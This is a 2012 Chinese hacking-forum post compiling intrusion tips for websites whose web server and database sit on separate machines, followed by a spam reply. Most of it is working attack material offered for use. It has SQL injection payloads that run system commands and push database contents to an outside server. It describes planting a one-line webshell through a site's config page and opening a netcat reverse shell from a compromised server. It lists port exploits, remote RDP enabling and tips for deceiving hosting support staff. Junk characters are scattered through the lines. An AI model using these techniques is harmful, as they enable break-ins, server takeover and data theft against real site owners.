找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3666|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
1 R0 z: u' c5 D9 S) }" i7 l# F7 f: x& X: m. u( i& ]3 r9 I
. `4 L! A- _' C3 U- f# U. U
SA点数据库分离搞法+语句:
5 {% e8 `$ R. _; z: N+ U9 u$ ]) H2 I7 T8 c
注射点不显错,执行下面三条语句页面都返回正常。
% h* r* u$ O, K+ Oand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
0 a9 N8 K9 \, R2 M2 L  ^& X" qand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
: U: L; ~3 {+ |$ N- V" fand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')3 j# C* U) `$ m/ y9 }7 K3 M
可以列目录,判断系统为2000,web与数据库分离) g8 W1 n5 N2 o, C9 m: Y
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
- j" S# r  }* a$ m( c- R7 O在注射点上执行
* x6 `' s/ v4 I  l! r8 R: wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
1 I' X' z, ~/ `! ], O页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP+ d' |8 Z( m3 d" o( ~
还有我用NC监听得其他端口都没有得到IP。
4 Z- x+ ~. v& k5 X  g/ j' s8 Y( f
# D& X1 F- m3 k& }# Q9 N通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
6 E8 V& o) U+ y" O'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
2 e. {, G" X; ^6 W  i. L% _/ v
9 Q% q9 ]( Z) I4 X0 s;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--& V9 N! u! V+ M

; g( r+ r9 `1 o现在就猜想是不是数据库是内网而且不能连外网。
: ]3 ~: w. h4 @  a
% P) f  a% r5 F4 U. M% ]/ D' J' p' }4 ?# ?0 `1 Y; _, w
access导出txt文本代码
% O$ J1 n3 x- {SELECT * into [test.txt] in 'd:\web\' 'text;' from admin  Y$ e2 }, s  u
! d, A3 o7 Q( r8 U9 i* H8 F

' b% V7 ^( z' d4 @2 R; B& V* v. i3 R- z
自动跳转到指定网站代码头
4 ~+ j( v7 x% v8 h5 J7 Z; O<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>! k( l6 a2 e! R: V4 c- t2 }

4 Z3 d8 d) B. t0 U; X; D* R9 m6 e) E  T( M2 J
入侵java or jsp站点时默认配置文件路径:
$ G) ~% i0 F; x" o\web-inf\web.xml8 K* V- g* P4 I% |1 M' {
tomcat下的配置文件位置:3 s7 Z) {! D2 p0 i3 E
\conf\server.xml            (前面加上tomcat路径)
. `5 K4 g7 x2 C. e# w9 Q0 v, y\Tomcat 5.0\webapps\root\web-inf\struts-config.xml, [8 l7 [. v: ]2 x$ X  X) d& H

. o' s- }$ R, q" ^( q7 m# ^/ v
1 h% {( l: d7 ]& M* B( _; I, C- t) N% W. Y" [9 W5 U; R6 `% S/ j
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
: o: c8 Y8 k2 r-1%23
# v) M( r! t6 |. `: j  Z  k>
: C: i# U9 w% }, x( b5 N" O<
9 k& X; U& c+ C5 r( h6 k/ s  \1'+or+'1'='1
3 N: u" q" r5 H0 Z  {5 Yid=8%bf
% E% T% A! u' v) \) d
. I8 X( H% p+ m* n2 \全新注入点检测试法:
* }4 S4 E# V0 X  D# H; Q. i在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。; Q- u8 ?% j% W" m- r$ W7 t
4 ~" C1 `3 ^0 H, r8 Q8 d
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
; ~: Q9 q6 U6 L" B* M
! R' s: z, ?9 m% W' `0 O& _6 e  s搜索型注入判断方法:
5 j6 _& d4 D5 q4 M) G5 Z* N北京%' and '1'='1' and '%'='/ _" m# E! H$ k# s( R' g
北京%' and '1'='2' and '%'='
* I% c/ j5 U6 J* V3 W  A7 c4 f1 ^
3 [$ ]$ x; Z* ?  q# b5 l- S& ^7 o* _1 A) K4 N
COOKIES注入:
$ s* ^' N$ F& l. s/ V) ~4 l
+ r5 r5 A" z& ljavascript:alert(document.cookie="id="+escape("51 and 1=1"));8 I  M- R% ~9 {: _' ?% ^
6 ^$ G/ M& G# i& `" J) z
2000专业版查看本地登录用户命令:
+ `3 ^0 o1 D5 W2 {/ @' nnet config workstation
! c+ P( `+ ^) \% ^8 n
9 z* _& f3 A" c! W, u" ?* F; [0 s4 |3 r( R6 n7 J: _5 L6 A  I2 ~
2003下查看ipsec配置和默认防火墙配置命令:7 Q3 t3 a* N' ]$ _  b
netsh firewall show config, N7 u# ^2 C0 q: r( K0 Y4 e
netsh ipsec static show all
* }/ i# c  Y$ T7 u7 y) H4 O9 U( w# |* Y, j6 f. E
不指派指定策略命令:* I0 ]1 |! s  f5 q
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)' c. I$ l& [8 d7 I( s
netsh ipsec static show policy all  显示策略名7 T1 K9 E+ q4 V! m0 x

* C+ E! U0 O1 v( r$ b. r# \3 u
9 L6 r1 u: W6 _0 }! ]猜管理员后台小技巧:: Z$ X9 n9 d+ K1 m5 Z) ?) D' t
admin/left.asp 2 O" G1 `( k  f- O0 T
admin/main.asp9 O9 j! J% e5 L# z# `5 V/ R
admin/top.asp/ K/ C2 n, H6 h
admin/admin.asp 3 t# g- u( ]: h( C
会现出菜单导航,然后迅雷下载全部链接
* U5 k. W6 D6 ]' }9 t! g& W8 X5 A) a" f0 K4 l

! [( ^7 V) ~$ D' z6 D+ I社会工程学:
- c& d  u7 e. b: w2 p# l( E. v用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人3 o( U% m/ q5 w7 A
然后去骗客服
/ @' I" a* b8 ]( w) `7 {7 o5 K  ~7 u! e$ l1 x6 l

. F6 E1 r, w* b( o7 ]% Z. o统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: * B' F0 Z9 H. j
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
1 J0 o6 @) h* l9 p  w" }  X  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
6 N7 H3 R( M# X( m- W, d4 ^
- f7 K' _/ c) Z  u5 `' y8 }% X  k& i- P" p. O" a+ z4 g/ e9 g3 J
5 w  [- l& w; b$ E& V2 |
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)9 q! i2 w: A5 ~  |1 b+ u+ Z5 L

; x$ ^0 @0 d" j+ h( ~
7 i3 L) X- R5 m% d3 x- u
4 P( `3 P$ M9 j! I7 P. XCMD加密注册表位置2 V- ]5 q3 {0 l4 k
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
! l5 A1 T7 N9 G6 rAutoRun
6 ^$ B  y; F% z6 f  j% t/ G0 ^7 u
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor6 Y( ]; J7 ^' n8 ^  k
AutoRun
+ m; I# W! K" S, R5 B& u. B  g+ q
/ S# v1 t, X& \' C" C
在找注入时搜索Hidden,把他改成test
. `+ b8 G& |5 x4 ?+ y6 _4 R/ }5 V8 y! K" L( G5 J( w

" y, q' g4 m6 G! M# {1 A2 m
; A( L$ M& P  Lmstsc /v:IP /console 5 p" M+ {( x2 ~; Q

$ S6 y# e0 D# G2 l* e; K* K% d& ^' j8 b6 c1 J
一句话开3389:1 q, t! Y1 m; G) }) Q8 x8 J6 o

2 p+ i0 K8 r# _6 f最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  ! p8 u4 Y2 R" x5 Z
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
, V1 f, k0 p4 C& o# ?; `  d/ Z# e- D% j+ a
) i6 G7 z- T" e: q+ g% }
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:6 s- X5 J7 r- @' G5 g- t3 k
Insert into admin(user,pwd) values('test','test')& S) s2 }* L: e" E( X

  n+ ]! |6 k) y% v& h* ^. a# i8 L8 f8 j) f
NC反弹$ q" H: }8 l: T, B7 @
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
* ]  q- u1 p# o4 H0 a然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)/ E* |: F: q3 ]
6 ^0 j# ]6 P; }$ i* d

* O- W/ E& Z$ A& r7 A1 L在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
* U: {7 L# ]; l5 c9 U
3 w/ ?% E2 r% `; w% I! ?有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录  f6 n9 |9 R* r/ X, M
例如:" U9 F, p% ?* Q8 g
subst k: d:\www\ 用d盘www目录替代k盘
# Z$ x* k8 b& \/ Psubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表